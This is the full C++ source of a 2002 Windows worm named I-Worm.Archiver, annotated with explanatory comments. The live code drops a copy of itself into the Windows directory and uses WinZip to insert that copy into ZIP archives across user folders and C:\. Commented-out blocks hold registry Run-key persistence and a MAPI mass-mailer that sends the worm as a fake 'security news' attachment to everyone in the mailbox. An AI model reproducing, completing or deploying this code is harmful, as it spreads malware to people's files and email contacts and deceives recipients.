/*
Name : I-Worm.Archiver
Author : PetiK
Date : Mai 10th 2002 -
Language : C++

Comments : Infect ZIP files which run with WINZIP.

We can also to do the same think with PowerArchiver:
powerarc -a -c4 archive.zip virus.exe
*/
#include <windows.h>
#include <stdio.h>
#include <mapi.h>
#pragma argused
#pragma inline
// File-scope state shared between WinMain() and infzip().  Being file-scope,
// every buffer below starts zero-filled; the strlen(winzip) gate in WinMain
// depends on that.
//
// filen   : full path of the running executable (GetModuleFileName).
// copyn   : drop location "<Windows dir>\Archiver.exe", built in WinMain.
// copyreg : copyn + " -i", the Run-key value the commented-out persistence
//           code would have written.
// windir/sysdir : Windows and System directories, later passed to infzip().
// inzip   : command line handed to WinExec() by infzip().
// fsubj   : subject buffer for the (commented-out) MAPI mailer.
char filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50];
// Word lists combined into the "News from <name><domain>" subject string
// of the (commented-out) mailer.
char *fnam[]={"news","support","info","newsletter","webmaster"};
char *fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@viruslist.com"};
// run      : HKLM autostart key; in this revision only referenced from
//            commented-out code.
// SHFolder : "Shell Folders" key read under HKEY_USERS\.DEFAULT to locate the
//            Desktop / Favorites / Personal folders.
LPSTR run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
// Attachment name template for the (commented-out) mailer; the eight 'x'
// characters are overwritten per message.
char attname[]="news_xxxxxxxx.exe";
LPTSTR cmdLine,ptr;      // GetCommandLine() result and the scan cursor over it
BOOL installed;          // TRUE when the process was started with "-i"
// Registry value buffers (50 bytes each) for the three shell-folder paths and
// the WinZip executable path; the size variables are passed by address to
// RegQueryValueEx and updated by it.
BYTE desktop[50],favoris[50],personal[50],winzip[50];
DWORD sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip);
DWORD type=REG_SZ;
long i;

// Simple-MAPI state for the mass-mailing routine.  In this revision the whole
// routine inside WinMain sits in a /* */ block, so none of this is used at
// run time and MAPI32.DLL is never loaded.
LHANDLE session;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;

HKEY hReg;               // registry handle reused for every key WinMain opens
WIN32_FIND_DATA ffile;   // FindFirstFile/FindNextFile result used by infzip()

void infzip(char *);

// Simple-MAPI entry points that the commented-out mailer resolves with
// GetProcAddress (MAPISendMail, MAPILogoff, MAPILogon, MAPIFindNext,
// MAPIReadMail, MAPIFreeBuffer).
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
// Entry point.  What this revision actually does, in order:
//   1. records its own path and builds the drop path "<WinDir>\Archiver.exe";
//   2. scans the command line for "-i" (already installed) or "-p" (shows
//      the author's credit dialogs and exits);
//   3. without "-i": copies itself to the drop path and exits.  The Run-key
//      write that would autostart the copy is commented out, and nothing else
//      in this file launches the copy with "-i";
//   4. with "-i": reads the shell-folder paths and the WinZip location from
//      the registry and calls infzip() on each folder.
// The connectivity check and the Simple-MAPI mailer that follow step 4 are
// inside one /* */ block and are not compiled.
// Observable artefacts of the compiled path: Archiver.exe in the Windows
// directory, a process started with "-i", reads of the HKEY_USERS\.DEFAULT
// Shell Folders key and of the winzip32.exe App Paths key, and the WinZip
// child processes infzip() spawns.
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{

	// Own path, then "<WinDir>\Archiver.exe" as the copy target; windir keeps
	// the bare Windows directory for infzip().
	GetModuleFileName(hInst,filen,100);
	GetSystemDirectory((char *)sysdir,100);
	GetWindowsDirectory((char *)copyn,100);
	strcpy(windir,copyn);
	strcat(copyn,"\\Archiver.exe");

	installed=FALSE;
	cmdLine=GetCommandLine();
	if(cmdLine) {
		// Advance to the first '-' (or stop at the last character); only the
		// character after the dash is inspected.
		for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
		if(ptr[0]=='-' && ptr[1]!=0) {
			switch(ptr[1]) {
			default:
				break;
			case 'i':
				installed=TRUE;   // second-stage run from the dropped copy
				break;
			case 'p':
				// Credit dialogs only, then exit.
				ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0);
				MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance - (c)2002",
				"I-Worm.Archiver",MB_OK|MB_ICONINFORMATION);
				ExitProcess(0);
				break;
			}
		}
	}

	// First stage: drop a copy and stop.  The commented-out lines are the
	// intended HKLM\...\Run persistence ("Archiver" = "<drop path> -i");
	// they are not compiled in this revision.
	if(!installed) {
		CopyFile(filen,copyn,FALSE);
		strcpy(copyreg,copyn);
		strcat(copyreg," -i");
/* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100);
RegCloseKey(hReg); */
		ExitProcess(0);
	}

	// Second stage.  Desktop / Favorites / Personal come from the .DEFAULT
	// user's Shell Folders key, the WinZip path from the default value of its
	// App Paths entry.  No return value is checked; winzip starts zero-filled
	// (file scope), so if the App Paths lookup does not fill it the strlen()
	// gate below skips the infection step entirely.
	RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
	RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
	RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
	RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
	RegCloseKey(hReg);
	RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg);
	RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip);
	RegCloseKey(hReg);

	// Only when a WinZip path was read: every *.zip in each of these folders
	// (and the root of C:) is handed to infzip().
	if(strlen(winzip)!=0) {
		infzip(windir);
		infzip(sysdir);
		infzip(desktop);
		infzip(personal);
		infzip(favoris);
		infzip("C:\\");
	}

	// Disabled code, one block comment up to the closing "*/" below:
	//  - inline asm that loads WININET.DLL and polls InternetGetConnectedState
	//    until a connection is reported;
	//  - a Simple-MAPI routine that logs on, walks every message in the
	//    default store with MAPIFindNext/MAPIReadMail, and sends each message's
	//    originator a reply with a "News from ..." subject and the running
	//    executable attached under a randomised "news_########.exe" name.
	// None of it is compiled in this revision.
/*
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf

end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm

Tmp dd 0

end_all_asm:
}


hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);

for(i=0;i<8;i++)
attname[i+5]='1'+(char)(9*rand()/RAND_MAX);
fsubj[0]=0;
wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]);


mes->ulReserved=0;
mes->lpszSubject=fsubj;
mes->lpszNoteText="This is some news send by our firm about security.\n"
"Please read by clicking on attached file.\n"
"\tBest Regards";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filen;
mes->lpFiles->lpszFileName=attname;
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}

*/

	ExitProcess(0);
}
// Hands every *.zip in `folder` to WinZip together with the dropped copy.
//
// folder : directory to scan; an empty string is ignored.  The call changes
//          the process's current directory (SetCurrentDirectory), which is
//          why FindFirstFile can use the bare "*.zip" pattern.
// Globals used: winzip (WinZip path from the registry), ffile (find data),
// inzip (command buffer), copyn (path of the dropped Archiver.exe).
// Per archive it runs `<winzip> -a -r <archive.zip> <WinDir>\Archiver.exe`
// through WinExec(), so the observable side effect is a WinZip process with
// "-a -r" and the Archiver.exe path on its command line.
void infzip(char *folder)
{
	register bool abc=TRUE;   // loop flag: FindNextFile result of the previous round
	register HANDLE fh;
	if(strlen(folder)!=0) {
		SetCurrentDirectory(folder);
		fh=FindFirstFile("*.zip",&ffile);
		if(fh!=INVALID_HANDLE_VALUE) {
			while(abc) {
				// Build "<winzip> -a -r <zip> <copyn>" and launch it.
				inzip[0]=0;
				wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
				WinExec(inzip,1);   // 1 == SW_SHOWNORMAL: the WinZip window is visible
				abc=FindNextFile(fh,&ffile);
			}
		}
	}

}